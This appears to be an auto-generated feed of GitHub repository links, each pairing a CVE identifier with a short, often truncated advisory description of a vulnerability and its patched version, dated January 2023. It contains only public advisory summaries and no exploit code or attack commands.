**A vulnerability was found in PeterMu nodebatis up to 2.1.x. It has been classified as critical. Affected is an unknown function. The manipulation leads to sql injection. Upgrading to version 2.2.0 is able to address this issue. The name of the patch is 6629ff5b7e3d62ad8319007a54589ec1f62c7c35. It is recommended to upgr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25066](https://github.com/Live-Hack-CVE/CVE-2018-25066) create time: 2023-01-06T13:51:48Z

**A vulnerability was found in trampgeek jobe up to 1.6.x and classified as critical. This issue affects the function run_in_sandbox of the file application/libraries/LanguageTask.php. The manipulation leads to command injection. Upgrading to version 1.7.0 is able to address this issue. The name of the patch is 8f43daf50 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36642](https://github.com/Live-Hack-CVE/CVE-2020-36642) create time: 2023-01-06T13:51:53Z

**A vulnerability was found in Forged Alliance Forever up to 3746. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Vote Handler. The manipulation leads to improper authorization. Upgrading to version 3747 is able to address this issue. The name of the patch is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4879](https://github.com/Live-Hack-CVE/CVE-2022-4879) create time: 2023-01-06T13:51:57Z

**A vulnerability, which was classified as critical, was found in Seiji42 cub-scout-tracker. This affects an unknown part of the file databaseAccessFunctions.js. The manipulation leads to sql injection. The name of the patch is b4bc1a328b1f59437db159f9d136d9ed15707e31. It is recommended to apply a patch to fix this issue CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125046](https://github.com/Live-Hack-CVE/CVE-2014-125046) create time: 2023-01-06T11:40:19Z

**A vulnerability, which was classified as critical, has been found in jeff-kelley opensim-utils. Affected by this issue is the function DatabaseForRegion of the file regionscrits.php. The manipulation of the argument region leads to sql injection. The name of the patch is c29e5c729a833a29dbf5b1e505a0553fe154575e. It is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10016](https://github.com/Live-Hack-CVE/CVE-2015-10016) create time: 2023-01-06T11:40:24Z

**A vulnerability classified as problematic was found in e-Contract dssp up to 1.3.1. Affected by this vulnerability is the function checkSignResponse of the file dssp-client/src/main/java/be/e_contract/dssp/client/SignResponseVerifier.java. The manipulation leads to xml external entity reference. Upgrading to version 1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-15011](https://github.com/Live-Hack-CVE/CVE-2016-15011) create time: 2023-01-06T11:40:28Z

**no description** : [kriso4os/CVE-2018-25031](https://github.com/kriso4os/CVE-2018-25031) create time: 2023-01-06T11:58:15Z

**A vulnerability was found in FreePBX arimanager up to 13.0.5.3 and classified as problematic. Affected by this issue is some unknown functionality of the component Views Handler. The manipulation of the argument dataurl leads to cross site scripting. The attack may be launched remotely. Upgrading to version 13.0.5.4 is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25090](https://github.com/Live-Hack-CVE/CVE-2019-25090) create time: 2023-01-06T11:41:11Z

**A vulnerability classified as problematic has been found in Indeed Engineering util up to 1.0.33. Affected is the function visit/appendTo of the file varexport/src/main/java/com/indeed/util/varexport/servlet/ViewExportedVariablesServlet.java. The manipulation leads to cross site scripting. It is possible to launch the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36634](https://github.com/Live-Hack-CVE/CVE-2020-36634) create time: 2023-01-06T11:41:07Z

**A vulnerability was found in moodle-block_sitenews 1.0. It has been classified as problematic. This affects the function get_content of the file block_sitenews.php. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. Upgrading to version 1.1 is able to address this issu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36633](https://github.com/Live-Hack-CVE/CVE-2020-36633) create time: 2023-01-06T11:41:03Z

**A vulnerability classified as problematic was found in OpenMRS openmrs-module-referenceapplication up to 2.11.x. Affected by this vulnerability is the function post of the file omod/src/main/java/org/openmrs/module/referenceapplication/page/controller/UserAppPageController.java of the component User App Page. The manip CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4289](https://github.com/Live-Hack-CVE/CVE-2021-4289) create time: 2023-01-06T11:40:59Z

**A vulnerability was found in OpenMRS openmrs-module-referenceapplication up to 2.11.x. It has been rated as problematic. This issue affects some unknown processing of the file omod/src/main/webapp/pages/userApp.gsp. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to versi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4288](https://github.com/Live-Hack-CVE/CVE-2021-4288) create time: 2023-01-06T11:40:55Z

**A vulnerability was found in dolibarr_project_timesheet up to 4.5.5. It has been declared as problematic. This vulnerability affects unknown code of the component Form Handler. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. Upgrading to version 4.5.6.a is able to address thi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4766](https://github.com/Live-Hack-CVE/CVE-2022-4766) create time: 2023-01-06T11:40:51Z

**A vulnerability classified as critical has been found in JATOS. Affected is the function ZipUtil of the file modules/common/app/utils/common/ZipUtil.java of the component ZIP Handler. The manipulation leads to path traversal. Upgrading to version 3.7.5-alpha is able to address this issue. The name of the patch is 2b425 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4878](https://github.com/Live-Hack-CVE/CVE-2022-4878) create time: 2023-01-06T11:40:41Z

**Usage of temporary files with insecure permissions by the Apache James server allows an attacker with local access to access private user data in transit. Vulnerable components includes the SMTP stack and IMAP APPEND command. This issue affects Apache James server version 3.7.2 and prior versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45935](https://github.com/Live-Hack-CVE/CVE-2022-45935) create time: 2023-01-06T11:40:36Z

**Unproper laxist permissions on the temporary files used by MIME4J TempFileStorageProvider may lead to information disclosure to other local users. This issue affects Apache James MIME4J version 0.8.8 and prior versions. We recommend users to upgrade to MIME4j version 0.8.9 or later. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45787](https://github.com/Live-Hack-CVE/CVE-2022-45787) create time: 2023-01-06T11:40:33Z

**Ghidra/RuntimeScripts/Linux/support/launch.sh in NSA Ghidra through 10.2.2 passes user-provided input into eval, leading to command injection when calling analyzeHeadless with untrusted input. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22671](https://github.com/Live-Hack-CVE/CVE-2023-22671) create time: 2023-01-06T11:40:46Z

**Cross-site scripting (XSS) vulnerability in BlackCat CMS 1.1.2 allows remote attackers to inject arbitrary web script or HTML via the name in a new group to backend/groups/index.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-5521](https://github.com/Live-Hack-CVE/CVE-2015-5521) create time: 2023-01-06T06:13:34Z

**Due to improper validation of caller input, validation is silently disabled if the provided expected token is malformed, causing any user supplied token to be considered valid. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36564](https://github.com/Live-Hack-CVE/CVE-2020-36564) create time: 2023-01-06T06:14:26Z

**Due to improper path santization, archives containing relative file paths can cause files to be written (or overwritten) outside of the target directory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36561](https://github.com/Live-Hack-CVE/CVE-2020-36561) create time: 2023-01-06T06:14:22Z

**Authentication is globally bypassed in github.com/nanobox-io/golang-nanoauth between v0.0.0-20160722212129-ac0cc4484ad4 and v0.0.0-20200131131040-063a3fb69896 if ListenAndServe is called with an empty token. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36569](https://github.com/Live-Hack-CVE/CVE-2020-36569) create time: 2023-01-06T06:14:13Z

**A vulnerability classified as problematic has been found in OpenMRS Admin UI Module up to 1.4.x. Affected is the function sendErrorMessage of the file omod/src/main/java/org/openmrs/module/adminui/page/controller/systemadmin/accounts/AccountPageController.java of the component Account Setup Handler. The manipulation le CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36636](https://github.com/Live-Hack-CVE/CVE-2020-36636) create time: 2023-01-06T06:13:42Z

**Due to unbounded alias chasing, a maliciously crafted YAML file can cause the system to consume significant system resources. If parsing user input, this may be used as a denial of service vector. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4235](https://github.com/Live-Hack-CVE/CVE-2021-4235) create time: 2023-01-06T06:14:17Z

**The Noise protocol implementation suffers from weakened cryptographic security after encrypting 2^64 messages, and a potential denial of service attack. After 2^64 (~18.4 quintillion) messages are encrypted with the Encrypt function, the nonce counter will wrap around, causing multiple messages to be encrypted with the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4239](https://github.com/Live-Hack-CVE/CVE-2021-4239) create time: 2023-01-06T06:14:09Z

**A vulnerability was found in OpenMRS Admin UI Module up to 1.5.x. It has been declared as problematic. This vulnerability affects unknown code of the file omod/src/main/webapp/pages/metadata/locations/location.gsp. The manipulation leads to cross site scripting. The attack can be initiated remotely. Upgrading to versio CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4291](https://github.com/Live-Hack-CVE/CVE-2021-4291) create time: 2023-01-06T06:13:38Z

**dedecms <=V5.7.102 is vulnerable to SQL Injection. In sys_ sql_ n query.php there are no restrictions on the sql query. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46442](https://github.com/Live-Hack-CVE/CVE-2022-46442) create time: 2023-01-06T06:14:05Z

**A vulnerability, which was classified as problematic, has been found in FlatPress. This issue affects some unknown processing of the file setup/lib/main.lib.php of the component Setup. The manipulation leads to cross site scripting. The attack may be initiated remotely. The name of the patch is 5f23b4c2eac294cc0ba5e541 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4822](https://github.com/Live-Hack-CVE/CVE-2022-4822) create time: 2023-01-06T06:13:59Z

**A vulnerability classified as problematic was found in FlatPress. This vulnerability affects the function onupload of the file admin/panels/uploader/admin.uploader.php of the component XML File Handler/MD File Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. The name of the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4821](https://github.com/Live-Hack-CVE/CVE-2022-4821) create time: 2023-01-06T06:13:54Z

**A vulnerability classified as problematic has been found in FlatPress. This affects an unknown part of the file admin/panels/entry/admin.entry.list.php of the component Admin Area. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is 229752b51025e67837 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4820](https://github.com/Live-Hack-CVE/CVE-2022-4820) create time: 2023-01-06T06:13:51Z

**A vulnerability was found in HotCRP. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation leads to cross site scripting. The attack may be launched remotely. The name of the patch is d4ffdb0ef806453c54ddca7fdda3e5c60356285c. It is recommended to apply a patch to fix t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4819](https://github.com/Live-Hack-CVE/CVE-2022-4819) create time: 2023-01-06T06:13:47Z

**Versions of the package exec-local-bin before 1.2.0 are vulnerable to Command Injection via the theProcess() functionality due to improper user-input sanitization. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25923](https://github.com/Live-Hack-CVE/CVE-2022-25923) create time: 2023-01-06T06:13:29Z

**Information disclosure due to an insecure hostname validation in the RYDE application 5.8.43 for Android and iOS allows attackers to take over an account via a deep link. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42979](https://github.com/Live-Hack-CVE/CVE-2022-42979) create time: 2023-01-06T06:13:25Z

**A reflected cross-site scripting (XSS) vulnerability in maccms10 v2022.1000.3032 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter under the AD Management module. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44870](https://github.com/Live-Hack-CVE/CVE-2022-44870) create time: 2023-01-06T06:13:21Z

**SQL injection vulnerability in sourcecodester Theme Park Ticketing System 1.0 allows remote attackers to view sensitive information via the id parameter to the /tpts/manage_user.php page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40049](https://github.com/Live-Hack-CVE/CVE-2022-40049) create time: 2023-01-06T06:13:16Z

**The Nuxeo Platform is an open source content management platform for building business applications. In version 11.5.109, the `oauth2` REST API is vulnerable to Reflected Cross-Site Scripting (XSS). This XSS can be escalated to Remote Code Execution (RCE) by levering the automation API. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32828](https://github.com/Live-Hack-CVE/CVE-2021-32828) create time: 2023-01-06T01:46:25Z

**no description** : [111ddea/Xstream_cve-2022-41966](https://github.com/111ddea/Xstream_cve-2022-41966) create time: 2023-01-06T02:37:07Z

**RESERVED An issue in the /login/index.php component of Centos Web Panel 7 before v0.9.8.1147 allows unauthenticated attackers to execute arbitrary system commands via crafted HTTP requests. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44877](https://github.com/Live-Hack-CVE/CVE-2022-44877) create time: 2023-01-06T01:46:29Z

**Insufficient Granularity of Access Control in GitHub repository usememos/memos prior to 0.9.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4801](https://github.com/Live-Hack-CVE/CVE-2022-4801) create time: 2023-01-06T01:46:21Z

**Improper Verification of Source of a Communication Channel in GitHub repository usememos/memos prior to 0.9.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4800](https://github.com/Live-Hack-CVE/CVE-2022-4800) create time: 2023-01-06T01:46:16Z

**Comparison of Object References Instead of Object Contents in GitHub repository usememos/memos prior to 0.9.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4812](https://github.com/Live-Hack-CVE/CVE-2022-4812) create time: 2023-01-06T01:46:11Z

**Improper Authorization in GitHub repository usememos/memos prior to 0.9.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4811](https://github.com/Live-Hack-CVE/CVE-2022-4811) create time: 2023-01-06T01:46:07Z

**Improper Access Control in GitHub repository usememos/memos prior to 0.9.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4810](https://github.com/Live-Hack-CVE/CVE-2022-4810) create time: 2023-01-06T01:46:02Z

**Improper Access Control in GitHub repository usememos/memos prior to 0.9.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4809](https://github.com/Live-Hack-CVE/CVE-2022-4809) create time: 2023-01-06T01:45:58Z

**Improper Privilege Management in GitHub repository usememos/memos prior to 0.9.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4808](https://github.com/Live-Hack-CVE/CVE-2022-4808) create time: 2023-01-06T01:45:54Z

**Improper Access Control in GitHub repository usememos/memos prior to 0.9.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4807](https://github.com/Live-Hack-CVE/CVE-2022-4807) create time: 2023-01-06T01:45:49Z

**Improper Access Control in GitHub repository usememos/memos prior to 0.9.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4806](https://github.com/Live-Hack-CVE/CVE-2022-4806) create time: 2023-01-06T01:45:44Z

**Incorrect Use of Privileged APIs in GitHub repository usememos/memos prior to 0.9.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4805](https://github.com/Live-Hack-CVE/CVE-2022-4805) create time: 2023-01-06T01:45:40Z

**Improper Access Control in GitHub repository usememos/memos prior to 0.9.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4814](https://github.com/Live-Hack-CVE/CVE-2022-4814) create time: 2023-01-06T01:45:35Z

**Insufficient Granularity of Access Control in GitHub repository usememos/memos prior to 0.9.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4813](https://github.com/Live-Hack-CVE/CVE-2022-4813) create time: 2023-01-06T01:45:31Z

**Huawei Aslan Children's Watch has an improper input validation vulnerability. Successful exploitation may cause the watch's application service abnormal. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39012](https://github.com/Live-Hack-CVE/CVE-2022-39012) create time: 2023-01-06T01:45:26Z

**There is a denial of service vulnerability in the Wi-Fi module of the HUAWEI WS7100-20 Smart WiFi Router.Successful exploit could cause a denial of service (DoS) condition. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46740](https://github.com/Live-Hack-CVE/CVE-2022-46740) create time: 2023-01-06T01:45:22Z

**Huawei Aslan Children's Watch has an improper authorization vulnerability. Successful exploit could allow the attacker to access certain file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45874](https://github.com/Live-Hack-CVE/CVE-2022-45874) create time: 2023-01-06T01:45:17Z

**Huawei Aslan Children's Watch has a path traversal vulnerability. Successful exploitation may allow attackers to access or modify protected system resources. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44564](https://github.com/Live-Hack-CVE/CVE-2022-44564) create time: 2023-01-06T01:45:11Z

**There is an insufficient authentication vulnerability in some Huawei band products. Successful exploit could allow the attacker to spoof then connect to the band. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41579](https://github.com/Live-Hack-CVE/CVE-2022-41579) create time: 2023-01-06T01:45:07Z

**CVE was unused by HPE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44536](https://github.com/Live-Hack-CVE/CVE-2022-44536) create time: 2023-01-06T01:45:01Z

**CVE was unused by HPE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44541](https://github.com/Live-Hack-CVE/CVE-2022-44541) create time: 2023-01-06T01:44:58Z

**CVE was unused by HPE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44540](https://github.com/Live-Hack-CVE/CVE-2022-44540) create time: 2023-01-06T01:44:53Z

**CVE was unused by HPE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44539](https://github.com/Live-Hack-CVE/CVE-2022-44539) create time: 2023-01-06T01:44:49Z

**CVE was unused by HPE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44538](https://github.com/Live-Hack-CVE/CVE-2022-44538) create time: 2023-01-06T01:44:43Z

**CVE was unused by HPE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44537](https://github.com/Live-Hack-CVE/CVE-2022-44537) create time: 2023-01-06T01:44:38Z

**A vulnerability has been found in meol1 and classified as critical. Affected by this vulnerability is the function GetAnimal of the file opdracht4/index.php. The manipulation of the argument where leads to sql injection. The name of the patch is 82441e413f87920d1e8f866e8ef9d7f353a7c583. It is recommended to apply a pat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125045](https://github.com/Live-Hack-CVE/CVE-2014-125045) create time: 2023-01-05T23:33:40Z

**DES cipher, which has inadequate encryption strength, is used Hitachi Energy FOXMAN-UN to encrypt user credentials used to access the Network Elements. Successful exploitation allows sensitive information to be decrypted easily. This issue affects * FOXMAN-UN product: FOXMAN-UN R16A, FOXMAN-UN R15B, FOXMAN-UN R15A, FOX CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40341](https://github.com/Live-Hack-CVE/CVE-2021-40341) create time: 2023-01-05T23:34:26Z

**CVE was unused by HPE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41010](https://github.com/Live-Hack-CVE/CVE-2021-41010) create time: 2023-01-05T23:34:07Z

**CVE was unused by HPE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41009](https://github.com/Live-Hack-CVE/CVE-2021-41009) create time: 2023-01-05T23:34:02Z

**CVE was unused by HPE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41008](https://github.com/Live-Hack-CVE/CVE-2021-41008) create time: 2023-01-05T23:33:57Z

**CVE was unused by HPE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41007](https://github.com/Live-Hack-CVE/CVE-2021-41007) create time: 2023-01-05T23:33:53Z

**CVE was unused by HPE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41006](https://github.com/Live-Hack-CVE/CVE-2021-41006) create time: 2023-01-05T23:33:48Z

**In the DES implementation, the affected product versions use a default key for encryption. Successful exploitation allows an attacker to obtain sensitive information and gain access to the network elements that are managed by the affected products versions. This issue affects * FOXMAN-UN product: FOXMAN-UN R16A, FOXMAN CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40342](https://github.com/Live-Hack-CVE/CVE-2021-40342) create time: 2023-01-05T23:33:44Z

**Improper Access Control in GitHub repository usememos/memos prior to 0.9.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4803](https://github.com/Live-Hack-CVE/CVE-2022-4803) create time: 2023-01-05T23:34:51Z

**There is a reflected XSS vulnerability in Esri Portal for ArcGIS versions 10.9.1 and below which may allow a remote, unauthenticated attacker to create a crafted link which when clicked could execute arbitrary JavaScript code in the victim’s browser. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38209](https://github.com/Live-Hack-CVE/CVE-2022-38209) create time: 2023-01-05T23:34:47Z

**There is a reflected XSS vulnerability in Esri Portal for ArcGIS versions 10.8.1 and 10.7.1 which may allow a remote remote, unauthenticated attacker to create a crafted link which when clicked which could execute arbitrary JavaScript code in the victim’s browser. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38207](https://github.com/Live-Hack-CVE/CVE-2022-38207) create time: 2023-01-05T23:34:44Z

**There is a reflected XSS vulnerability in Esri Portal for ArcGIS versions 10.9.1 and below which may allow a remote remote, unauthenticated attacker to create a crafted link which when clicked could execute arbitrary JavaScript code in the victim’s browser. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38206](https://github.com/Live-Hack-CVE/CVE-2022-38206) create time: 2023-01-05T23:34:39Z

**In some non-default installations of Esri Portal for ArcGIS versions 10.9.1 and below, a directory traversal issue may allow a remote, unauthenticated attacker to traverse the file system and lead to the disclosure of sensitive data (not customer-published content). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38205](https://github.com/Live-Hack-CVE/CVE-2022-38205) create time: 2023-01-05T23:34:35Z

**There is a reflected XSS vulnerability in Esri Portal for ArcGIS versions 10.8.1 and 10.7.1 which may allow a remote, unauthenticated attacker to create a crafted link which when clicked could potentially execute arbitrary JavaScript code in the victim’s browser. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38204](https://github.com/Live-Hack-CVE/CVE-2022-38204) create time: 2023-01-05T23:34:31Z

**Communication between the client and the server application of the affected products is partially done using CORBA (Common Object Request Broker Architecture) over TCP/IP. This protocol is not encrypted and allows tracing of internal messages. This issue affects * FOXMAN-UN product: FOXMAN-UN R15B, FOXMAN-UN R15A, FOXM CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3929](https://github.com/Live-Hack-CVE/CVE-2022-3929) create time: 2023-01-05T23:34:21Z

**Hardcoded credential is found in affected products' message queue. An attacker that manages to exploit this vulnerability will be able to access data to the internal message queue. This issue affects * FOXMAN-UN product: FOXMAN-UN R15B, FOXMAN-UN R15A, FOXMAN-UN R14B, FOXMAN-UN R14A, FOXMAN-UN R11B, FOXMAN-UN R11A, FOX CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3928](https://github.com/Live-Hack-CVE/CVE-2022-3928) create time: 2023-01-05T23:34:16Z

**The affected products store both public and private key that are used to sign and protect Custom Parameter Set (CPS) file from modification. An attacker that manages to exploit this vulnerability will be able to change the CPS file, sign it so that it is trusted as the legitimate CPS file. This issue affects * FOXMAN-U CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3927](https://github.com/Live-Hack-CVE/CVE-2022-3927) create time: 2023-01-05T23:34:11Z

**Improper Authorization in GitHub repository usememos/memos prior to 0.9.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4802](https://github.com/Live-Hack-CVE/CVE-2022-4802) create time: 2023-01-05T23:33:36Z

**NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer handler, where an integer truncation can lead to an out-of-bounds read, which may lead to denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34680](https://github.com/Live-Hack-CVE/CVE-2022-34680) create time: 2023-01-05T23:33:31Z

**NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer (nvidia.ko), where an integer overflow may lead to denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42259](https://github.com/Live-Hack-CVE/CVE-2022-42259) create time: 2023-01-05T23:33:24Z

**NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer (nvidia.ko), where an integer overflow may lead to denial of service, data tampering, or information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42258](https://github.com/Live-Hack-CVE/CVE-2022-42258) create time: 2023-01-05T23:33:20Z

**NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer (nvidia.ko), where an integer overflow may lead to information disclosure, data tampering or denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42257](https://github.com/Live-Hack-CVE/CVE-2022-42257) create time: 2023-01-05T23:33:15Z

**A vulnerability, which was classified as critical, was found in soshtolsus wing-tight. This affects an unknown part of the file index.php. The manipulation of the argument p leads to file inclusion. It is possible to initiate the attack remotely. Upgrading to version 1.0.0 is able to address this issue. The name of the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125044](https://github.com/Live-Hack-CVE/CVE-2014-125044) create time: 2023-01-05T21:22:44Z

**A vulnerability, which was classified as problematic, has been found in vicamo NetworkManager. Affected by this issue is the function send_arps of the file src/devices/nm-device.c. The manipulation leads to unchecked return value. The name of the patch is 4da19b89815cbf6e063e39bc33c04fe4b3f789df. It is recommended to a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125043](https://github.com/Live-Hack-CVE/CVE-2014-125043) create time: 2023-01-05T21:22:39Z

**A vulnerability classified as problematic was found in vicamo NetworkManager. Affected by this vulnerability is the function nm_setting_vlan_add_priority_str/nm_utils_rsa_key_encrypt/nm_setting_vlan_add_priority_str. The manipulation leads to missing release of resource. The name of the patch is afb0e2c53c4c17dfdb89d63 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125042](https://github.com/Live-Hack-CVE/CVE-2014-125042) create time: 2023-01-05T21:22:35Z

**A vulnerability has been found in Red Snapper NView and classified as critical. This vulnerability affects the function mutate of the file src/Session.php. The manipulation of the argument session leads to sql injection. The name of the patch is cbd255f55d476b29e5680f66f48c73ddb3d416a8. It is recommended to apply a pat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20163](https://github.com/Live-Hack-CVE/CVE-2017-20163) create time: 2023-01-05T21:22:49Z

**Discourse is an option source discussion platform. Prior to version 2.8.14 on the `stable` branch and version 3.0.0.beta16 on the `beta` and `tests-passed` branches, when a user requests for a password reset link email, then changes their primary email, the old reset email is still valid. When the old reset email is us CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46177](https://github.com/Live-Hack-CVE/CVE-2022-46177) create time: 2023-01-05T21:22:53Z

**Discourse is an option source discussion platform. Prior to version 2.8.14 on the `stable` branch and version 2.9.0.beta15 on the `beta` and `tests-passed` branches, users can create posts with raw body longer than the `max_length` site setting by including html comments that are not counted toward the character limit. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23549](https://github.com/Live-Hack-CVE/CVE-2022-23549) create time: 2023-01-05T21:22:21Z

**Discourse is an option source discussion platform. Prior to version 2.8.14 on the `stable` branch and version 2.9.0.beta16 on the `beta` and `tests-passed` branches, parsing posts can be susceptible to XSS attacks. This issue is patched in versions 2.8.14 and 2.9.0.beta16. There are no known workarounds. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23548](https://github.com/Live-Hack-CVE/CVE-2022-23548) create time: 2023-01-05T21:22:17Z

**In version 2.9.0.beta14 of Discourse, an open-source discussion platform, maliciously embedded urls can leak an admin's digest of recent topics, possibly exposing private information. A patch is available for version 2.9.0.beta15. There are no known workarounds for this issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23546](https://github.com/Live-Hack-CVE/CVE-2022-23546) create time: 2023-01-05T21:22:12Z

**Improper Access Control in GitHub repository ikus060/rdiffweb prior to 2.5.5. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4724](https://github.com/Live-Hack-CVE/CVE-2022-4724) create time: 2023-01-05T21:22:04Z

**The JetWidgets for Elementor plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.12. This is due to missing nonce validation on the save() function. This makes it possible for unauthenticated attackers to to modify the plugin's settings via a forged request granted the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0086](https://github.com/Live-Hack-CVE/CVE-2023-0086) create time: 2023-01-05T21:23:07Z

**Discourse is an option source discussion platform. Prior to version 2.8.14 on the `stable` branch and version 3.0.0.beta16 on the `beta` and `tests-passed` branches, pending post titles can be used for cross-site scripting attacks. Pending posts can be created by unprivileged users when a category has the "require mode CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22454](https://github.com/Live-Hack-CVE/CVE-2023-22454) create time: 2023-01-05T21:23:03Z

**Discourse is an option source discussion platform. Prior to version 2.8.14 on the `stable` branch and version 3.0.0.beta16 on the `beta` and `tests-passed` branches, the number of times a user posted in an arbitrary topic is exposed to unauthorized users through the `/u/username.json` endpoint. The issue is patched in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22453](https://github.com/Live-Hack-CVE/CVE-2023-22453) create time: 2023-01-05T21:22:58Z

